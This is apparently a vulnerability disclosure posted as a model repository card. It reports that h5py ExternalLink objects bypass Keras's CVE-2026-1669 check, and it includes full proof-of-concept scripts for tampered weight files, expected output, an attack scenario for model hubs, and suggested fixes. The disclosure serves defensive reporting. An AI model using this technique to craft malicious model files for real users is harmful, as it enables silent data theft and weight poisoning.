You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

Huntr MFV Submission: Incomplete ExternalLink Fix in Keras HDF5 Weight Loading (CVE-2026-1669 Bypass)

Target: MFV -- Keras Native (.keras) format Category: Path Traversal / Arbitrary File Read Program: Model File Vulnerability


Title

Incomplete ExternalLink fix in Keras HDF5 weight loading bypasses CVE-2026-1669 check (arbitrary file read)

Description

A malicious .keras model or .weights.h5 file can read arbitrary HDF5 data from the victim's local filesystem by using h5py.ExternalLink objects in weight datasets. The CVE-2026-1669 fix in saving_lib.py checks dataset.external (the raw HDF5 external storage property) but does not detect h5py.ExternalLink, which h5py resolves transparently. The resulting dataset appears as a normal h5py.Dataset with .external = None, so the security check passes silently.

Both model.load_weights() and keras.saving.load_model() with safe_mode=True (the default) are affected.

Root Cause

The _verify_dataset() method in keras/src/saving/saving_lib.py (lines 1047-1057) performs a single security check:

def _verify_dataset(self, dataset):
    if not isinstance(dataset, h5py.Dataset):
        raise ValueError(
            f"Invalid H5 file, expected Dataset, received {type(dataset)}"
        )
    if dataset.external:
        raise ValueError(
            "Not allowed: H5 file Dataset with external links: "
            f"{dataset.external}"
        )
    return dataset

This check inspects dataset.external, which is the HDF5 raw external storage property (used for datasets whose raw data is stored in external binary files). This is a different mechanism from h5py.ExternalLink, which is an HDF5 link that points to a dataset in another HDF5 file.

When h5py encounters an ExternalLink, it transparently opens the target file and resolves the link to the dataset object. The resulting h5py.Dataset:

  • Passes isinstance(dataset, h5py.Dataset) -- it is a real Dataset
  • Has dataset.external == None -- the target dataset uses normal (non-external) storage
  • Contains data from the attacker-specified external file

The check was introduced in response to CVE-2026-1669 but only covers one of the two HDF5 mechanisms for referencing external data. h5py.ExternalLink is the more dangerous of the two because it can reference entire datasets in arbitrary HDF5 files, rather than just raw binary chunks.

Additional Gap: VirtualDataset

The _verify_dataset() check also does not inspect dataset.is_virtual. HDF5 Virtual Datasets (h5py.VirtualLayout / h5py.VirtualSource) can map regions of a dataset to data stored in other HDF5 files, providing a second bypass path using the same principle.

Proof of Concept

Prerequisites

pip install keras==3.13.2 tensorflow h5py numpy

Step 1: Generate tampered model files

#!/usr/bin/env python3
"""
PoC Generator: HDF5 ExternalLink bypass (CVE-2026-1669)

Creates:
  1. An external HDF5 file with a sentinel value (simulating stolen data)
  2. A tampered .weights.h5 where the kernel dataset is replaced with
     an ExternalLink pointing to the external file
  3. A tampered .keras directory-format model with the same ExternalLink
"""
import os
import shutil
import sys

import h5py
import numpy as np

os.environ.setdefault("TF_CPP_MIN_LOG_LEVEL", "3")
import keras

# --- Configuration ---
EXTERNAL_H5_PATH = "/tmp/keras_h5_external_source.h5"
EXTERNAL_DATASET = "/stolen"
MARKER_VALUE = 42.0  # sentinel value to prove exfiltration

OUTPUT_DIR = os.path.dirname(os.path.abspath(__file__))
WEIGHTS_PATH = os.path.join(OUTPUT_DIR, "poc_tampered.weights.h5")
KERAS_DIR_PATH = os.path.join(OUTPUT_DIR, "poc_tampered_dir")


def create_external_source():
    """Create the external HDF5 file simulating data on the victim's filesystem."""
    print(f"[1] Creating external HDF5 source: {EXTERNAL_H5_PATH}")
    with h5py.File(EXTERNAL_H5_PATH, "w") as ef:
        ef.create_dataset(
            EXTERNAL_DATASET.lstrip("/"),
            data=np.array([[MARKER_VALUE]], dtype="float32"),
        )
    print(f"    Dataset '{EXTERNAL_DATASET}' = [[{MARKER_VALUE}]]")


def create_tampered_weights():
    """Create a legit .weights.h5 file, then replace kernel with ExternalLink."""
    print(f"[2] Creating tampered weights: {WEIGHTS_PATH}")

    model = keras.Sequential([
        keras.layers.Dense(1, input_shape=(1,), name="dense"),
    ])
    model.build((None, 1))

    legit_path = "/tmp/keras_extlink_legit.weights.h5"
    model.save_weights(legit_path)
    shutil.copy(legit_path, WEIGHTS_PATH)
    os.unlink(legit_path)

    kernel_path = "layers/dense/vars/0"

    with h5py.File(WEIGHTS_PATH, "a") as wf:
        original = wf[kernel_path][()]
        print(f"    Original kernel: {original}")
        del wf[kernel_path]
        wf[kernel_path] = h5py.ExternalLink(EXTERNAL_H5_PATH, EXTERNAL_DATASET)
        print(f"    Replaced with ExternalLink -> {EXTERNAL_H5_PATH}:{EXTERNAL_DATASET}")

    print(f"    Size: {os.path.getsize(WEIGHTS_PATH)} bytes")


def create_tampered_keras_dir():
    """Create a .keras directory-format model with tampered weights."""
    print(f"[3] Creating tampered .keras directory: {KERAS_DIR_PATH}")

    model = keras.Sequential([
        keras.layers.Dense(1, input_shape=(1,), name="dense"),
    ])
    model.build((None, 1))

    if os.path.isdir(KERAS_DIR_PATH):
        shutil.rmtree(KERAS_DIR_PATH)

    os.makedirs(KERAS_DIR_PATH, exist_ok=True)

    legit_zip = "/tmp/keras_extlink_legit.keras"
    model.save(legit_zip)

    import zipfile
    with zipfile.ZipFile(legit_zip, "r") as zf:
        for name in zf.namelist():
            target = os.path.join(KERAS_DIR_PATH, name)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(name) as src, open(target, "wb") as dst:
                dst.write(src.read())

    os.unlink(legit_zip)

    weights_h5 = os.path.join(KERAS_DIR_PATH, "model.weights.h5")
    kernel_path = "layers/dense/vars/0"

    with h5py.File(weights_h5, "a") as wf:
        del wf[kernel_path]
        wf[kernel_path] = h5py.ExternalLink(EXTERNAL_H5_PATH, EXTERNAL_DATASET)

    print(f"    Weights tampered: {weights_h5}")
    print(f"    ExternalLink -> {EXTERNAL_H5_PATH}:{EXTERNAL_DATASET}")


if __name__ == "__main__":
    create_external_source()
    create_tampered_weights()
    create_tampered_keras_dir()
    print("\n[*] Artifacts ready. Run poc_verify.py to confirm the bypass.")

Step 2: Verify bypass

#!/usr/bin/env python3
"""Verify the HDF5 ExternalLink bypass against CVE-2026-1669 fix."""
import os
import sys

os.environ.setdefault("TF_CPP_MIN_LOG_LEVEL", "3")
import keras
import numpy as np

SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
WEIGHTS_PATH = os.path.join(SCRIPT_DIR, "poc_tampered.weights.h5")
KERAS_DIR_PATH = os.path.join(SCRIPT_DIR, "poc_tampered_dir")
MARKER_VALUE = 42.0


def check_weights_for_marker(weights, label):
    """Check if any weight array contains the sentinel value."""
    print(f"    Weight arrays: {len(weights)}")
    for i, w in enumerate(weights):
        print(f"      weight[{i}] shape={w.shape} values={w.tolist()}")

    found = any(MARKER_VALUE in w.flatten() for w in weights)
    if found:
        print(f"\n    >>> BYPASS CONFIRMED ({label}) <<<")
        print(f"    >>> Sentinel {MARKER_VALUE} loaded from external file")
        print(f"    >>> CVE-2026-1669 _verify_dataset check was NOT triggered")
    return found


# Vector 1: model.load_weights()
print("=" * 60)
print("Vector 1: model.load_weights() on tampered .weights.h5")
print("=" * 60)
model = keras.Sequential([keras.layers.Dense(1, input_shape=(1,), name="dense")])
model.build((None, 1))
model.load_weights(WEIGHTS_PATH)
v1 = check_weights_for_marker(model.get_weights(), "load_weights")

# Vector 2: load_model() with safe_mode=True
print("\n" + "=" * 60)
print("Vector 2: load_model() on tampered .keras dir (safe_mode=True)")
print("=" * 60)
model2 = keras.saving.load_model(KERAS_DIR_PATH, safe_mode=True)
v2 = check_weights_for_marker(model2.get_weights(), "load_model")

if v1 and v2:
    print("\nRESULT: VULNERABILITY CONFIRMED -- both vectors bypass CVE-2026-1669")

Step 3: Expected output

============================================================
Vector 1: model.load_weights() on tampered .weights.h5
============================================================
    Weight arrays: 2
      weight[0] shape=(1, 1) values=[[42.0]]
      weight[1] shape=(1,) values=[0.0]

    >>> BYPASS CONFIRMED (load_weights) <<<
    >>> Sentinel 42.0 loaded from external file
    >>> CVE-2026-1669 _verify_dataset check was NOT triggered

============================================================
Vector 2: load_model() on tampered .keras dir (safe_mode=True)
============================================================
    Weight arrays: 2
      weight[0] shape=(1, 1) values=[[42.0]]
      weight[1] shape=(1,) values=[0.0]

    >>> BYPASS CONFIRMED (load_model dir) <<<
    >>> Sentinel 42.0 loaded from external file
    >>> CVE-2026-1669 _verify_dataset check was NOT triggered

RESULT: VULNERABILITY CONFIRMED -- both vectors bypass CVE-2026-1669

The model's kernel weight, which was originally a random float, now contains 42.0 -- the sentinel value from the external HDF5 file. The _verify_dataset() check did not raise any exception because the resolved dataset's .external property is empty.

One-liner reproduction

bash reproduce.sh

Impact

Attack Scenario

  1. Attacker crafts a .keras model (or .weights.h5 file) where one or more weight datasets are replaced with h5py.ExternalLink objects pointing to known HDF5 file paths on the victim's system
  2. Model is distributed via HuggingFace Hub, Kaggle, or any model-sharing platform
  3. Victim loads the model: model = keras.saving.load_model("model.keras") or model.load_weights("weights.h5") -- using all default safety settings
  4. h5py transparently follows the ExternalLinks, reading data from the victim's local HDF5 files into the model's weight tensors
  5. Attacker recovers the exfiltrated data by observing the model's inference output (which now reflects the stolen weights)

Concrete Exploitation

Weight poisoning / model integrity violation: An attacker replaces critical weight tensors with data sourced from external files. The model loads without error but produces attacker-controlled outputs. In safety-critical ML pipelines (medical imaging, autonomous systems, financial modeling), this silently corrupts inference results.

Arbitrary HDF5 file read: Many ML environments store sensitive data in HDF5 format -- other model weights, preprocessed datasets, experimental results, feature stores. The attacker can target known paths (e.g., ~/.keras/models/, common dataset directories) to exfiltrate this data through the model's weight tensors.

Information disclosure via inference: If the victim deploys the poisoned model as an API, the attacker can extract the stolen data by querying the model and observing outputs. The weight values directly influence inference results, creating a covert data exfiltration channel.

Why This Is Significant

  1. Bypasses an existing CVE fix. CVE-2026-1669 was specifically intended to block external data references in HDF5 model files. This bypass renders that mitigation incomplete.
  2. Works with safe_mode=True. The default safety setting provides no protection. There is no user action that prevents the attack short of inspecting raw HDF5 link structure before loading.
  3. Silent exploitation. No warnings, no errors, no exceptions. The model loads and runs normally. The only observable difference is in the weight values themselves.
  4. Low attacker complexity. Crafting the malicious file requires only standard h5py API calls (h5py.ExternalLink). No binary manipulation or format corruption needed.
  5. Broad attack surface. Affects model.load_weights(), keras.saving.load_model() (directory format), and potentially ZIP format when Keras extracts to a temporary directory for large models.

Comparison to CVE-2026-1669

Aspect CVE-2026-1669 (dataset.external) This Finding (h5py.ExternalLink)
Mechanism Raw HDF5 external storage HDF5 symbolic link to another file
Detected by _verify_dataset Yes No
Requires special HDF5 features Yes (external storage API) No (standard h5py link API)
h5py resolves transparently No (external property visible) Yes (link invisible after resolution)
Fix complexity Check dataset.external (done) Must inspect link type before resolution

Root Cause

HDF5 has two distinct mechanisms for referencing data stored outside the current file:

  1. External storage (dataset.external) -- A dataset property where the raw binary data is stored in a separate file. The dataset metadata remains in the original file. This is what CVE-2026-1669 checks for.

  2. ExternalLink (h5py.ExternalLink) -- An HDF5 link object that points to a group or dataset in a completely different HDF5 file. When h5py traverses the link, it transparently opens the target file and returns the resolved object. The caller sees a normal h5py.Dataset with no indication it came from another file.

The _verify_dataset() check at saving_lib.py:1047-1057 only handles mechanism (1). Mechanism (2) is more dangerous because it operates at the link level, before the dataset object is even constructed, and h5py provides no property on the resolved dataset indicating it was reached via an ExternalLink.

Suggested Fix

Immediate: Block ExternalLink resolution

Before accessing any dataset, check whether the HDF5 entry is an ExternalLink by inspecting the parent group's link info:

def _verify_dataset(self, dataset):
    if not isinstance(dataset, h5py.Dataset):
        raise ValueError(
            f"Invalid H5 file, expected Dataset, received {type(dataset)}"
        )
    if dataset.external:
        raise ValueError(
            "Not allowed: H5 file Dataset with external links: "
            f"{dataset.external}"
        )
    if dataset.is_virtual:
        raise ValueError(
            "Not allowed: H5 file Dataset with virtual sources"
        )
    return dataset

And in all code paths that access entries in an HDF5 group, check the link type before resolving:

def _verify_link(self, group, key):
    link = group.get(key, getlink=True)
    if isinstance(link, h5py.ExternalLink):
        raise ValueError(
            f"Not allowed: ExternalLink in H5 file at '{key}' "
            f"-> {link.filename}:{link.path}"
        )
    if isinstance(link, h5py.SoftLink):
        # Verify soft link target is within the same file
        pass

Additional: Block VirtualDataset

Add dataset.is_virtual check to block h5py.VirtualLayout / h5py.VirtualSource references to external files.

Architectural

Recursively walk all groups in the HDF5 file at load time and reject any entry whose link type is h5py.ExternalLink, before h5py has a chance to resolve it. This provides defense-in-depth regardless of where datasets are accessed.

Affected Versions

Keras: 3.13.2 (latest, tested 2026-02-22)
h5py: 3.12+ (ExternalLink support has existed since h5py 2.x)
Python: 3.13

All Keras 3.x versions that include the CVE-2026-1669 fix are affected, as the fix is incomplete. Keras versions prior to the CVE-2026-1669 fix are also affected (but by the original vulnerability, not this bypass).

CWE Classification

  • CWE-22 (Improper Limitation of a Pathname to a Restricted Directory / Path Traversal) -- The ExternalLink allows referencing files outside the intended model file boundary
  • CWE-73 (External Control of File Name or Path) -- Attacker controls which external file is read via the ExternalLink path

Files

poc_generator.py               -- Generates tampered model files with ExternalLink
poc_verify.py                   -- Verifies bypass on both attack vectors
reproduce.sh                    -- One-command reproduction script
verification_output.txt         -- Captured output from verification run
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support